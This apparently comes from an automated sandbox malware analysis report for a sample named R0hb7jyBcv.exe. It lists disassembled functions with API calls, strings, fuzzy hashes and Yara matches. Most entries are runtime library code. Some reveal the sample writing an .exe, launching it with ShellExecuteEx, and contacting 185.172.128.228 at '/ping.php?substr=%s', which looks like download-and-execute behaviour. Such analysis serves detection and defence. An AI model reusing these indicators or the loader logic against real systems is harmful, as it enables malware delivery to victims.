_free.LIBCMT ref: 00416DD7
_free.LIBCMT ref: 00416DFE
SetLastError.KERNEL32(00000000), ref: 00416E0B
SetLastError.KERNEL32(00000000), ref: 00416E14

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction ID: 6e49a9887b0250ccd633565296769d6b3062fe87a49412782ccaa8615f8c8364
Opcode Fuzzy Hash: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction Fuzzy Hash: C201F9363847106792217676BC85EEB262D9BC5374763027FF819922D2EF3DCC92505D

Uniqueness

Uniqueness Score: -1.00%

Function 0041ED6E Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041ED86

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 0041ED98
_free.LIBCMT ref: 0041EDAA
_free.LIBCMT ref: 0041EDBC
_free.LIBCMT ref: 0041EDCE

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 12b51190f65240c3d2ef2a1ad5896f3b430592fd2ccf38004c9c9016fab84203
Instruction ID: d5ef32133b98e4fb2412931fa35fae6bc57e2fe493cbd1108eefdbae164f4dde
Opcode Fuzzy Hash: 12b51190f65240c3d2ef2a1ad5896f3b430592fd2ccf38004c9c9016fab84203
Instruction Fuzzy Hash: 6DF04F32544310ABCA20EB6AF885DDB73E9BA44714755181AF848D7640C638FCC0865D

Uniqueness

Uniqueness Score: -1.00%

Function 024F5519 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024F5537

Part of subcall function 024F6501: HeapFree.KERNEL32(00000000,00000000,?,024FF288,?,00000000,?,00000000,?,024FF52C,?,00000007,?,?,024FF920,?), ref: 024F6517
Part of subcall function 024F6501: GetLastError.KERNEL32(?,?,024FF288,?,00000000,?,00000000,?,024FF52C,?,00000007,?,?,024FF920,?,?), ref: 024F6529

_free.LIBCMT ref: 024F5549
_free.LIBCMT ref: 024F555C
_free.LIBCMT ref: 024F556D
_free.LIBCMT ref: 024F557E

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction ID: 454902c8314906b9cf92449922e2323be22630567445635de97e7c6d5f142510
Opcode Fuzzy Hash: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction Fuzzy Hash: 38F030B0811121ABCF67AF55FC406063766EB44710352756FF31462278CF3647918FCA

Uniqueness

Uniqueness Score: -1.00%

Function 004152B2 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004152D0

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 004152E2
_free.LIBCMT ref: 004152F5
_free.LIBCMT ref: 00415306
_free.LIBCMT ref: 00415317

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction ID: 804699b6a5c80bac2842bae3f4e6e7460cbec33686f784624dec7bd42b1af61a
Opcode Fuzzy Hash: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction Fuzzy Hash: 41F030714413209B8A16BF15FC416893B60FB4871831275AFF50866275CB3959918FCE

Uniqueness

Uniqueness Score: -1.00%

Function 0041608E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Strings

@, xrefs: 0041618D

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2895899722
Opcode ID: 70cdf97db86fb0d935fe44adb4be9c8666ab98f3e4a20976dc49b384eadb291b
Instruction ID: ae3557305dc9c54a6d59b1edd30c6b9f9c56a404ae947bd98c264bdf0008d32a
Opcode Fuzzy Hash: 70cdf97db86fb0d935fe44adb4be9c8666ab98f3e4a20976dc49b384eadb291b
Instruction Fuzzy Hash: EF51D171D00209ABDB10AFA9C845FEF7BB8AF45314F12015BE804B7292D778D982CB69

Uniqueness

Uniqueness Score: -1.00%

Function 024F352A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\R0hb7jyBcv.exe,00000104), ref: 024F356A
_free.LIBCMT ref: 024F3635
_free.LIBCMT ref: 024F363F

Strings

C:\Users\user\Desktop\R0hb7jyBcv.exe, xrefs: 024F3561, 024F3568, 024F3597, 024F35CF

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\R0hb7jyBcv.exe
API String ID: 2506810119-4121070482
Opcode ID: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
Instruction ID: 6b4b9aa42692e65952d8e0c608a08f215326236b18941df5e0a077151202f439
Opcode Fuzzy Hash: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
Instruction Fuzzy Hash: 103150B1A00298ABDB61DF9A9C84A9EBFFDEBC4710F1050ABE60497310D7709A41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 004132C3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\R0hb7jyBcv.exe,00000104), ref: 00413303
_free.LIBCMT ref: 004133CE
_free.LIBCMT ref: 004133D8

Strings

C:\Users\user\Desktop\R0hb7jyBcv.exe, xrefs: 004132FA, 00413301, 00413330, 00413368

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\R0hb7jyBcv.exe
API String ID: 2506810119-4121070482
Opcode ID: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
Instruction ID: e0cf6dde0ac7f492d26fb7a27bfd3cf8f71fda75d9391d43b3cd8632259efb82
Opcode Fuzzy Hash: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
Instruction Fuzzy Hash: 72319371A0021CABDB219F9698819DEBBB8EB85315F1041ABED14D7210DB799A81CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 02506777 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40synchronizationCOMMON

Download Yara Rule

APIs

ShellExecuteEx.SHELL32(?), ref: 025067B9
WaitForSingleObject.KERNEL32(?,00008000), ref: 025067CD
CloseHandle.KERNEL32(?), ref: 025067D6

Strings

.exe, xrefs: 02506782

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: CloseExecuteHandleObjectShellSingleWait
String ID: .exe
API String ID: 3837156514-4119554291
Opcode ID: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction ID: 327c70b7e77bbc0fba943a5f024f6bb62b56eaaf102aab4a2b1e3b33af988170
Opcode Fuzzy Hash: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction Fuzzy Hash: 7B015A31D00218EBDF15DFA9E8859DDBFB8FF08640F408126E801A6260EB709A45CF84

Uniqueness

Uniqueness Score: -1.00%

Function 025064A9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,.exe,00000000,?,?,02505B74,00000001,?,/ping.php?substr=%s), ref: 025064C4
WriteFile.KERNEL32(00000000,?,?,00000001,00000000,?,02505B74,00000001,?,/ping.php?substr=%s,?), ref: 025064DC
CloseHandle.KERNEL32(00000000,?,02505B74,00000001,?,/ping.php?substr=%s,?), ref: 025064E5

Strings

.exe, xrefs: 025064AE

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: .exe
API String ID: 1065093856-4119554291
Opcode ID: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction ID: 2dac9b09bc715f63aeaa90f9c3f7659334fea05c8504b51eec78350d563c4cf4
Opcode Fuzzy Hash: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction Fuzzy Hash: 23E06572601124BBD7311B999C48FA7BE6CEF855A4F040125FB05D21509661DC0197B8

Uniqueness

Uniqueness Score: -1.00%

Function 024F7FD6 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 024F8061
__alldvrm.LIBCMT ref: 024F8262
__alldvrm.LIBCMT ref: 024F8284

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
Instruction ID: be708f9680d5437d6797cadce5d81dfe4db6596383479e5f81cf18983a6b8f2f
Opcode Fuzzy Hash: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
Instruction Fuzzy Hash: 54A13672A006869FEB628F18C8917AFBBE5EF91350F15426FD6959F381C3389941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00417D6F Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00417DFA
__alldvrm.LIBCMT ref: 00417FFB
__alldvrm.LIBCMT ref: 0041801D

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
Instruction ID: fd8853d8f1522a73f401650a4168fe8705857821074eec12fc08c2aeadde5945
Opcode Fuzzy Hash: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
Instruction Fuzzy Hash: 9EA11272A083869FDB218E18C881BEBBBF1EF55354F1441AEE5859B281D63C8982C758

Uniqueness

Uniqueness Score: -1.00%

Function 02502AD6 Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02502C05

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 0327c6b289028ba5b2b3c2fb758003783598fcbdb2bec9316035b6f17d33412a
Instruction ID: 7e903d30930f6946de0a3f4f2b74f3319669c81e9e51a94d282b20ca27f0e487
Opcode Fuzzy Hash: 0327c6b289028ba5b2b3c2fb758003783598fcbdb2bec9316035b6f17d33412a
Instruction Fuzzy Hash: 10412931A006056ADB616EB98CDCB7E3EAAFF85370F14061AFE28D61D0DB7485418B66

Uniqueness

Uniqueness Score: -1.00%

Function 0042286F Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0042299E

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e1eff9f77d6fe5220b41880063169ad7198556d756e84d98a38d826084e6795b
Instruction ID: 928e3cb369f2e27a6f9c5d6c25e794823a6f45c2d4bbec1796fd6aa098e8f7c9
Opcode Fuzzy Hash: e1eff9f77d6fe5220b41880063169ad7198556d756e84d98a38d826084e6795b
Instruction Fuzzy Hash: B2411B71B002247BDB206B7A9D41BAE36A4EF05334F54021BF818D6291D6FC8DC19669

Uniqueness

Uniqueness Score: -1.00%

Function 024FB567 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,0042E790,00000000,00000000,8B56FF8B,024F4002,?,00000004,00000001,0042E790,0000007F,?,8B56FF8B,00000001), ref: 024FB5B4
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 024FB63D
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 024FB64F
__freea.LIBCMT ref: 024FB658

Part of subcall function 024F7CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 024F7CDE

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 4c9fcdccec6534139f4d5072acc38e80a3e5bc7209392af5cdc3591196cc905b
Instruction ID: 428be9955b033dcc52bc9f688a13ae0bcc208a9365ada03b74e37921283be3d8
Opcode Fuzzy Hash: 4c9fcdccec6534139f4d5072acc38e80a3e5bc7209392af5cdc3591196cc905b
Instruction Fuzzy Hash: 0E31B271A0020AABEF248F65CC44DAF7BA5EF85B18F04412AED15D7290E735CD65CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 024ECF11 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 024ECF2B

Part of subcall function 024ECE78: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 024ECEA7
Part of subcall function 024ECE78: ___AdjustPointer.LIBCMT ref: 024ECEC2

_UnwindNestedFrames.LIBCMT ref: 024ECF40
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 024ECF51
CallCatchBlock.LIBVCRUNTIME ref: 024ECF79

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction ID: 3dccaff4c991da2b502aa9de848f600cad7eeb7da98ffbd06a28b4ab7187b1ea
Opcode Fuzzy Hash: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction Fuzzy Hash: BA012D72500108BBEF116E96CC40EEB7B6EEF59755F04411AFE0996120D731D8619BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0040CCAA Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0040CCC4

Part of subcall function 0040CC11: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0040CC40
Part of subcall function 0040CC11: ___AdjustPointer.LIBCMT ref: 0040CC5B

_UnwindNestedFrames.LIBCMT ref: 0040CCD9
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0040CCEA
CallCatchBlock.LIBVCRUNTIME ref: 0040CD12

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction ID: f1d65ff4a2caa8f4402a5ee0af87b259506669f2abbd9cc63769bcbaa0b6a130
Opcode Fuzzy Hash: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction Fuzzy Hash: 1D012D32500108BBDF116F96CC81DEF7F69EF99758F044129FE0866261D73AE861EBA4

Uniqueness

Uniqueness Score: -1.00%

Function 024F74BA Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,024EED94,00000000,00000000,?,024F7461,024EED94,00000000,00000000,00000000,?,024F7719,00000006,0042F348), ref: 024F74EC
GetLastError.KERNEL32(?,024F7461,024EED94,00000000,00000000,00000000,?,024F7719,00000006,0042F348,0042F340,0042F348,00000000,00000364,?,024F7052), ref: 024F74F8
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,024F7461,024EED94,00000000,00000000,00000000,?,024F7719,00000006,0042F348,0042F340,0042F348,00000000), ref: 024F7506

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction ID: bd218674125b82cbfbe6b442ebd61176c8f66a86564674860313deaaad721b20
Opcode Fuzzy Hash: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction Fuzzy Hash: F3014732701227ABC7708F28AC48A57BB98EF847A1F900531FB0AD3680DB64D902C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 0041293D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 004129CD

Strings

pow, xrefs: 004129A5, 004129C2

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 1002f3fead58ecdd09521feafb71d77c6abc34bad63ee383d6bbf70ab6509b6f
Instruction ID: 0a9ba9cf01538bb623dd895b254acf0ed02b79a8d0ee48bda8380b1111d13792
Opcode Fuzzy Hash: 1002f3fead58ecdd09521feafb71d77c6abc34bad63ee383d6bbf70ab6509b6f
Instruction Fuzzy Hash: 3651607175420196C7217718DF813FB6BA0EB40750F64497BE085C23A9EB7D8CE6DA8E

Uniqueness

Uniqueness Score: -1.00%

Function 0041DDFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0041DE21

Strings

, xrefs: 0041DE66
.A, xrefs: 0041DE13

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: Info
String ID: $.A
API String ID: 1807457897-2696116503
Opcode ID: 894c406951e1bf4a9ddc63c434b686542591dbb70d0a2e0ead158e77a5fc9e7b
Instruction ID: bc213980aac5c6bda6009a83c5849e62ad2cee4ae6a6ae2e32fe98ed2f123d1c
Opcode Fuzzy Hash: 894c406951e1bf4a9ddc63c434b686542591dbb70d0a2e0ead158e77a5fc9e7b
Instruction Fuzzy Hash: EA410AF190434C9EDB218E248D84BFABBB9DF55304F1404EEE58A97142D23DAA86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 024EA937 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 024EA96A
__IsNonwritableInCurrentImage.LIBCMT ref: 024EAA23

Strings

csm, xrefs: 024EAA0D

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction ID: 6e8c7c07dc5c7a737fb9afbcc22f394c91ded65f53e5dc1f6e1ab3c5089c51d5
Opcode Fuzzy Hash: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction Fuzzy Hash: 13411734E00269DBEF10DF29C884AAEBBB6BF45319F14819BE8165B391C731D956CF90

Uniqueness

Uniqueness Score: -1.00%

Function 024FFFF9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002), ref: 025000D4

Strings

OCP, xrefs: 0250004D
ACP, xrefs: 02500017

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction ID: 0a18930891d1ec2ec0ee59e878340819ed7805444b52a7bd74f3bde011604c54
Opcode Fuzzy Hash: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction Fuzzy Hash: 0621D062B01104A6EB348B54CEA5FB776AABF84B24FC68425EA09D71C0E737D941C36C

Uniqueness

Uniqueness Score: -1.00%

Function 0041FD92 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002), ref: 0041FE6D

Strings

OCP, xrefs: 0041FDE6
ACP, xrefs: 0041FDB0

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction ID: db8a1e39b5ed56134af0dcb237998205fad8b660637b78a6cadd581e1e0cf4fb
Opcode Fuzzy Hash: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction Fuzzy Hash: 20213872A04301A6DB308E15D9017E7739A9B60B24F164077E90AC7312E73ADDC7C39C

Uniqueness

Uniqueness Score: -1.00%

Function 025062B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 025062B6

Part of subcall function 024E1E19: __EH_prolog.LIBCMT ref: 024E1E1E

Part of subcall function 024E266A: __EH_prolog.LIBCMT ref: 024E266F

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 02506398

Strings

,jC, xrefs: 0250638D

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: H_prolog$Ios_base_dtorstd::ios_base::_
String ID: ,jC
API String ID: 420165198-3201430929
Opcode ID: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction ID: 2955dff0357a9be88ab00ac91d05245075d9f7d4e357ce10c4ba928e76fdb5ef
Opcode Fuzzy Hash: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction Fuzzy Hash: A431D775D01119DBDB14DF95D980AEDF7B5FF48304F10816ED416A3640DB746A08CF60

Uniqueness

Uniqueness Score: -1.00%

Function 004171B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00417217
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00417224

Strings

-@, xrefs: 004171EE, 00417202, 004171F3

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID: -@
API String ID: 2279764990-2564449678
Opcode ID: d5f4a00e4ea312b7d3a414fb44f76d48f23aa1c3aa7f8720876b6b1e831c6d21
Instruction ID: 290a678ed3add9fd0faa91afd9d0ee705692a8110a20fb2286b59343c35ba588
Opcode Fuzzy Hash: d5f4a00e4ea312b7d3a414fb44f76d48f23aa1c3aa7f8720876b6b1e831c6d21
Instruction Fuzzy Hash: 2B110A33A041209BAF369E19DC809DB73B5EB847247164172FD19AB354DA34DC86C6D9

Uniqueness

Uniqueness Score: -1.00%

Function 024E37D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 024E37DB

Strings

185.172.128.228, xrefs: 024E37E2
/ping.php?substr=%s, xrefs: 024E37E3

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: /ping.php?substr=%s$185.172.128.228
API String ID: 3519838083-3577573015
Opcode ID: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
